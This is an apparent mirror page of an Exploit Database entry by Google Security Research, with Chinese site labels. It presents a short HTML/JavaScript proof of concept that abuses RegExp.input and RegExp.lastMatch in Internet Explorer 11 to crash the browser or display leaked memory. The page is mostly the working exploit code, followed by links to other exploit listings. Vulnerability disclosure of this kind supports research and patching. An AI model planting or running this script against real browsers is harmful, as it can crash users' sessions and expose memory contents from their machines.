Internet Explorer – ‘RegExp.lastMatch’ Memory Disclosure

Exploit Database
18 阅读

作者： Google Security Research

日期： 2018-03-20
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/44312/

/*
There is a vulnerability in Internet Explorer that could potentially be used for memory disclosure.

This was tested on IE11 running on Window 7 64-bit with the latest patches applied.

PoC:

=========================================
*/

<!-- saved from url=(0014)about:internet -->
<script>

function main() {
RegExp.input = {toString: f};
alert(RegExp.lastMatch);
}

var input = [Array(10000000).join("a"), Array(11).join("b"), Array(100).join("a")].join("");

function f() {
String.prototype.match.call(input, "bbbbbbbbbb");
}

main();

</script>

/*
=========================================

Note that sometimes the PoC results in a crash (I made no attempt to make it reliable) while sometimes it results in pieces of memory being displayed
*/

last Exploits
Internet Explorer – ‘RegExp.lastMatch’ Memory Disclosure的更多信息

Microsoft Windows Kernel – ‘ATMFD.dll’ OTF Font Processing Pool-Based Buffer Overflow (MS16-026)：
Kaspersky AntiVirus – ‘.DEX’ File Format Memory Corruption：
GOMPlayer 2.2.53.5169 – ‘.wav’ Crash (PoC)：
WinMPG Video Convert 9.3.5 – Denial of Service：
Microsoft Internet Explorer 11 – ‘jscript!JSONStringifyObject’ Use-After-Free：
HCView – WriteAV Crash (PoC)：
Apple Mac OSX (Mavericks) – ‘IOBluetoothHCIUserClient’ Privilege Escalation：
PeerBlock 1.1 – Blue Screen of Death：